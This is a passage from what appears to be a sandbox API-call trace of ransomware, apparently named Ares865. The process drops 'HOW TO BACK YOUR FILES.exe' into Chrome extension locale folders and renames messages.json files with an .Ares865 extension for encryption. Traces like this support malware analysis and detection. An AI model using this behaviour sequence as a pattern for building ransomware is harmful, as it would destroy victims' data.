Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.Ares865") returned 164 [0103.902] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.904] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0103.908] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" [0103.908] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" [0103.908] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.908] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.909] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.909] GetLastError () returned 0x0 [0103.909] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.909] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1f2ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1f2ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.909] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.909] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.910] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.Ares865") returned 160 [0103.910] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.912] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=223) returned 1 [0103.915] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" [0103.915] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" [0103.915] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.916] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.916] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.916] GetLastError () returned 0x0 [0103.917] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.917] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1f2ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1f2ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.917] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.917] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.917] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.Ares865") returned 163 [0103.917] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.918] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.919] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=215) returned 1 [0103.922] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" [0103.922] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" [0103.922] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.922] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.923] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.923] GetLastError () returned 0x0 [0103.923] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.924] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1f2ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1f2ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.924] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.924] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.924] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.Ares865") returned 163 [0103.924] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.926] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=214) returned 1 [0103.932] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" [0103.932] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" [0103.932] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.932] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.933] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.933] GetLastError () returned 0x0 [0103.933] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.933] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1f2ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1f2ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.933] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.933] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.934] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.Ares865") returned 160 [0103.934] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.935] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=274) returned 1 [0103.942] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" [0103.942] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" [0103.942] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.943] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.943] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.943] GetLastError () returned 0x0 [0103.944] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f219000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f219000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.944] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.944] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.944] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.Ares865") returned 160 [0103.944] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user 